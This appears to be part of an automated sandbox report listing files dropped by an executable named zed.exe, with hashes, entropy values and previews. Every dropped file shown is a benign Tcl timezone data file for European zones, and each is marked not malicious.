                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10211
                                                                                                                                                                                                                                            Entropy (8bit):3.826887992237191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:GNoCvTZtcf80KYiK3BG0Myj9TYQOeMAwbccM0Fp:GNNTZtcf15iOBG08eNwbccM0Fp
                                                                                                                                                                                                                                            MD5:0625C99E16D3C956DED1C0C0F867DEC3
                                                                                                                                                                                                                                            SHA1:6ACDF0DB619B63E21EC89046B9320A85FBD3397A
                                                                                                                                                                                                                                            SHA-256:D04C4E25DF4DE1C1CFE1EF84B3B6DD746CF08A271AB0958F22C7D580A3ED10E6
                                                                                                                                                                                                                                            SHA-512:07AC42F0635DF01CC0AFD13F9668B143D4943BA0E4C377D254B5AF034D9DDBAB77BA813187E9AB73D2EEAD86EBAA26DC15599FD74FC82EEF287F5A6AB9C01635
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/London) {.. {-9223372036854775808 -75 0 LMT}.. {-3852662325 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.920751023999728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQavQLHKQX9J8QahCv:SlSWB9vsM3ymhS2HAIgoh26N/y1QzKQt
                                                                                                                                                                                                                                            MD5:E4A8C25756D6C5D2073A51D2B54E3A0C
                                                                                                                                                                                                                                            SHA1:4A24667ADC9BD31E8CB298BE3787C12301C3F1C8
                                                                                                                                                                                                                                            SHA-256:8C0486A5B235E8B01069420976E1B8D08D77A4BEF587203AF1B68D7B5333546E
                                                                                                                                                                                                                                            SHA-512:F3593C3B75C9DA931FB39BC2054EB9691C3A544A74F871425169C3244040D6D060510741FE1E352A1E59F53E5A585307D434A0D7C9D159D065717E78C807787C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Luxembourg) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8517
                                                                                                                                                                                                                                            Entropy (8bit):3.8326167134909177
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:k5m01LdXKc0TJp+bwS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOn:+DaNVLSs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:63263380F57B756A1DFA3796E4188CD3
                                                                                                                                                                                                                                            SHA1:8EEE707AC4FEA1C098C81AC2D289A46239121A5E
                                                                                                                                                                                                                                            SHA-256:5337C9843C56DEEC6B91C4468C76EC1C896E80421B72B583B69DE5579063E09A
                                                                                                                                                                                                                                            SHA-512:ACA4830020715C471741E27EB2292ACF002D2CD7EDCD1061978B64967EB447F61AA095F960D8A75A01B9B87558D83FF409F30BDACA83E063024F1E2381FA64C4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Madrid) {.. {-9223372036854775808 -884 0 LMT}.. {-2177452800 0 0 WET}.. {-1631926800 3600 1 WEST}.. {-1616889600 0 0 WET}.. {-1601168400 3600 1 WEST}.. {-1585353600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269820800 0 0 WET}.. {-1026954000 3600 1 WEST}.. {-1017619200 0 0 WET}.. {-1001898000 3600 1 WEST}.. {-999482400 7200 1 WEMT}.. {-986090400 3600 1 WEST}.. {-954115200 0 0 WET}.. {-940208400 3600 0 CET}.. {-873079200 7200 1 CEST}.. {-862621200 3600 0 CET}.. {-842839200 7200 1 CEST}.. {-828320400 3600 0 CET}.. {-811389600 7200 1 CEST}.. {-796870800 3600 0 CET}.. {-779940000 7200 1 CEST}.. {-765421200 3600 0 CET}.. {-74849
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8724
                                                                                                                                                                                                                                            Entropy (8bit):3.816380386871747
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:KAGvi2GmkwwnpH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZN:KLsww141sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:9B09D6EED8F23BAFFB62929C0115E852
                                                                                                                                                                                                                                            SHA1:4AEF15333C73C2836C09D818FD0E20440D7C4780
                                                                                                                                                                                                                                            SHA-256:C5C240BAAECE8235D1FBDD251C1A67CB2D2FC8195DD5BBE37FF9CFF0445FCDA2
                                                                                                                                                                                                                                            SHA-512:43AA3492BD335A290C6EFEE275B47EA18E544199E37A9BBAE2E350D42BDFF42F0E9ED461A4BB1824CA33F84A90D4060906844A3E22DA49C9821E4CB460832D6E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Malta) {.. {-9223372036854775808 3484 0 LMT}.. {-2403478684 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812588400 7200 1 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 3600 0 CET}.. {-81997200 7200 1 CEST}.. {-71715600 3600 0 CET}.. {-50547600 7200 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.959733196757503
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV1AYKjG5XHAIgoq2AYKjo0ARL/yQausWILMFJ8QaC:SlSWB9vsM3ymrAdjGJHAIgorAdjo0ANn
                                                                                                                                                                                                                                            MD5:C1844961691214F6E6DF6487788A7758
                                                                                                                                                                                                                                            SHA1:6D08E9FB7B8602A80622148BFACD9676F45F0E2B
                                                                                                                                                                                                                                            SHA-256:6136C3CFA4A767E7C9DDA23A283AD98B72E9868F192E6A8E3BFE6396F6989BD1
                                                                                                                                                                                                                                            SHA-512:B2D1EA51AC5B34792AC02820A9D60FD41F3B91AB6505896476FCB0DC339B8DC1DE9E2C89A7627F69E16247661AE8040D789FFD2F8F1CD59F243B57C4845B450F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Helsinki)]} {.. LoadTimeZoneFile Europe/Helsinki..}..set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2177
                                                                                                                                                                                                                                            Entropy (8bit):3.9354590900153172
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:K8cVnR7xhuHJkminzaVV04v3TfdGY3kNmneVuNlh000sGpde:5mnRtEpkmiSV3A8qcN
                                                                                                                                                                                                                                            MD5:9C10EAE9FA0DE192C5FD4F76E12606F0
                                                                                                                                                                                                                                            SHA1:AFD5650410EC3E6ED564A8B2ABF91709D090B4AD
                                                                                                                                                                                                                                            SHA-256:8C95EA696EA578DEF726502AC181AF475A676030878F56B4E2D667757BBD1C49
                                                                                                                                                                                                                                            SHA-512:3B9ED6B68858485B9A46A0863B7D9D3C1E4C5BBA269457F24A9A12C274F0F9B35E63D8C25EB53E7200DB57DD35ACCB7FD7D8AB005FEE2C4D7FC6E72E8CF57194
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Minsk) {.. {-9223372036854775808 6616 0 LMT}.. {-2840147416 6600 0 MMT}.. {-1441158600 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-899780400 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-804646800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {670374000 7200 0 EEMMTT}.. {670377600 10800 1 EEST}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.9089012087310095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtEXc4o3vXHAIgoquEXeRL/yQauPMFBx6QazEXcov:SlSWB9vsM3ymzESPHAIgozEON/ySRpEB
                                                                                                                                                                                                                                            MD5:2015CF8BBEEE12AF0D9C82FD2E246C72
                                                                                                                                                                                                                                            SHA1:062BFFBB266C3EBB5776A509DDB7A6044C82B864
                                                                                                                                                                                                                                            SHA-256:9DF16BB1C26100635DC4CB1DF409B0FA7B139C22BF09574ED337EE244CA3C546
                                                                                                                                                                                                                                            SHA-512:FD3479588D4F3B84CF6C8B8A5DB1AB3BFA0A87CA2FFADB4FEBBBB25711C77963BE7CD0D1DA5ED985D729F39C5B44E8CBD429F1E2DA813DF26272D66CAE4F425A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Paris)]} {.. LoadTimeZoneFile Europe/Paris..}..set TZData(:Europe/Monaco) $TZData(:Europe/Paris)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2430
                                                                                                                                                                                                                                            Entropy (8bit):3.942836780611272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:7fnjazk7e+LxhuHJkvVineTeCTU50x0Y7:7fnjazk7eoEpkvVieTeCTUax0Y7
                                                                                                                                                                                                                                            MD5:4547D47E9364ACAFB2A4BEE52D04BFBB
                                                                                                                                                                                                                                            SHA1:1E7F964692F81D49AEAF581FE70AD22D4E36226B
                                                                                                                                                                                                                                            SHA-256:31F9C3C2F17B3EE4FA6D9EE6A86BF407AC0377DE4D666C65E86CE5AC591F829F
                                                                                                                                                                                                                                            SHA-512:7F1D7C80A1BF611D5440EEF9085DA6CDED86B5EF4C2737C105640030E5AA998A0951182E72DC224190A25DA8846CDE856A78EBAA8876AA0B18B1CBCADBB060FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Moscow) {.. {-9223372036854775808 9017 0 LMT}.. {-2840149817 9017 0 MMT}.. {-1688265017 9079 0 MMT}.. {-1656819079 12679 1 MST}.. {-1641353479 9079 0 MMT}.. {-1627965079 16279 1 MDST}.. {-1618716679 12679 1 MST}.. {-1596429079 16279 1 MDST}.. {-1593820800 14400 0 MSD}.. {-1589860800 10800 0 MSK}.. {-1542427200 14400 1 MSD}.. {-1539493200 18000 1 +05}.. {-1525323600 14400 1 MSD}.. {-1491188400 7200 0 EET}.. {-1247536800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.7873368289068905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85GKLlXHAIgNwMGKLZRRL/yQatHefeWFKYGKL8n:SlSWB9vsM3yZdL1HAIgGMdLZRN/y3HeA
                                                                                                                                                                                                                                            MD5:BE82205480617CF07F76BA0DF06C95BC
                                                                                                                                                                                                                                            SHA1:46D2D8D9FE4FB570C2A09BC809B02C8960F9601F
                                                                                                                                                                                                                                            SHA-256:FC93B7516933EDFDC211AC0822EE88BF7ACAD1C58A0643B15294F82EB0F14414
                                                                                                                                                                                                                                            SHA-512:F490A70053A6011D80FB0A4E96D2871BFEEB168690E21C4EC31F2F5C0E24A67C706528C81322A1D48E71242F0FFA277550192925FDE5B1F34BFCB308290E11FC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Nicosia)]} {.. LoadTimeZoneFile Asia/Nicosia..}..set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.910647918749938
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQasWJAQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yI7Fv
                                                                                                                                                                                                                                            MD5:242748F361AD524CD8E288BEE8611E19
                                                                                                                                                                                                                                            SHA1:A636A544BB54851185E2BE83DAC69C813B824827
                                                                                                                                                                                                                                            SHA-256:C84E9C0D22059573079211CBF487072CAB95C14B5ECEFB596CF1F594ABD3458C
                                                                                                                                                                                                                                            SHA-512:404B272D0C6B70332052601EA65C0F7AE71C12F62D19FD3010BBA6FB25E4F2F95BB9E5F295D8494CBADB1AE9C7F833C42382AE7488317EA6F0C20E60B63BEFE8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Oslo) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9152
                                                                                                                                                                                                                                            Entropy (8bit):3.8506895725632746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:fySTO1C+4qoMYOKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdi:fdp+3Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:9CAF8C5C5AF630E7F782C0480DD786E7
                                                                                                                                                                                                                                            SHA1:9FBEF9EEDD8BAFB48B17E3AC388CFEF8DCD10CB0
                                                                                                                                                                                                                                            SHA-256:AE61491C4A587F56426A9F2118E31060276F2B0231E750C461781577551CA196
                                                                                                                                                                                                                                            SHA-512:F809744BB597184A2815758A27B6A07C515C65DB96CFFB3625FD059DEBBF05EE903E999483B3459C7C8D3991824746F8530CD1378F8A63B1F54F60CFACE9F89B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Paris) {.. {-9223372036854775808 561 0 LMT}.. {-2486592561 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1470618000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1253494800 3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.910162937111088
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQazKIGl1/yQ0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNK
                                                                                                                                                                                                                                            MD5:52C36955D6BD1D9FE9CB64822D04B6DB
                                                                                                                                                                                                                                            SHA1:D5FF82EC486409E6FB314AD5ACE608577C9632CF
                                                                                                                                                                                                                                            SHA-256:B87630FF459DE07EB16CD0C2452660772E3FFC4EEB8419EA77A013B6F63A5900
                                                                                                                                                                                                                                            SHA-512:ABA49D3F05A41A4982600E4DA5C225D8994251F447401EE6FE8478E008BCD5D41C057034185B5CFF805634D571F3CC98EFE98093ABC8E6271351E11A4DA1E7AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8038
                                                                                                                                                                                                                                            Entropy (8bit):3.8240363895915914
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Kr9+neXAS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlh:KnASs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:828134FA1263FEFA2B06A8B2F075F564
                                                                                                                                                                                                                                            SHA1:4B332DE6E0855F8B9517F7098A3FB439671FC349
                                                                                                                                                                                                                                            SHA-256:5D3AFED5C1B07C6C6635D6BDEB28A0FB4D11A61F25F26C91227B2254BE5F4AA0
                                                                                                                                                                                                                                            SHA-512:9AB1462CDBD7F13F0CECDCCC2D91A85D8C0576B71508F935D26638C25ED023CF8FF4BA4FFDA402B308E6142B135D1B9D88700A519DBE2381E8E945329A5354F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Prague) {.. {-9223372036854775808 3464 0 LMT}.. {-3786829064 3464 0 PMT}.. {-2469401864 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-777862800 7200 0 CEST}.. {-765327600 3600 0 CET}.. {-746578800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-728517600 0 1 GMT}.. {-721260000 0 0 CET}.. {-716425200 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654217200 7200 1 CEST}.. {-639010800 3600 0 CET}.. {283993200 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7658
                                                                                                                                                                                                                                            Entropy (8bit):3.7750218768791806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:eq+cEpkjXkSV385aNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:ePWjUS7ivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:0D3C919F60081388524BD5DB22E6904B
                                                                                                                                                                                                                                            SHA1:6691EAB901C8B57D2F2693120A45A67799D05FCB
                                                                                                                                                                                                                                            SHA-256:8B64A42BAFD90F9255CACFDBAC603D638DD7C18DC27249F9C9B515E1DA634424
                                                                                                                                                                                                                                            SHA-512:62A2820B8C1C5468AC1F1BB626F9AAAD0BA1DEC5B73740F00FE4DB8CFA3F2BCF9947968E693824FC8770BA20AB962F93F7E5E345AE8A85F99CDB18E2B510308E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Riga) {.. {-9223372036854775808 5794 0 LMT}.. {-2840146594 5794 0 RMT}.. {-1632008194 9394 1 LST}.. {-1618702594 5794 0 RMT}.. {-1601681794 9394 1 LST}.. {-1597275394 5794 0 RMT}.. {-1377308194 7200 0 EET}.. {-928029600 10800 0 MSK}.. {-899521200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-795834000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {6
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8813
                                                                                                                                                                                                                                            Entropy (8bit):3.8168470239811736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:hhGvC2GmkNXEq74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhn:hUsF41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:C4F49446D3696301EDB339691DCB2FDB
                                                                                                                                                                                                                                            SHA1:537963A77B9BE9BE6B997A812A6E6DD120F6F247
                                                                                                                                                                                                                                            SHA-256:DCD2D9144507311E573568598E1FFD0E0574FB677AA0DAFC5641D80A19EB6E58
                                                                                                                                                                                                                                            SHA-512:1F0A9A549FA0995C51E90AC392671E3F09744B268F1EE6A27CA7E3C41C2B02A4BA0F98369BE40BA482FBA1FED8F1EE712F0B3217AD86164D1AD498E369C24D76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Rome) {.. {-9223372036854775808 2996 0 LMT}.. {-3252098996 2996 0 RMT}.. {-2403565200 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-830307600 7200 0 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-807152400 7200 0 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 36
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2118
                                                                                                                                                                                                                                            Entropy (8bit):3.664269700453612
                                                                                                                                                                                                                                            Encrypted:false
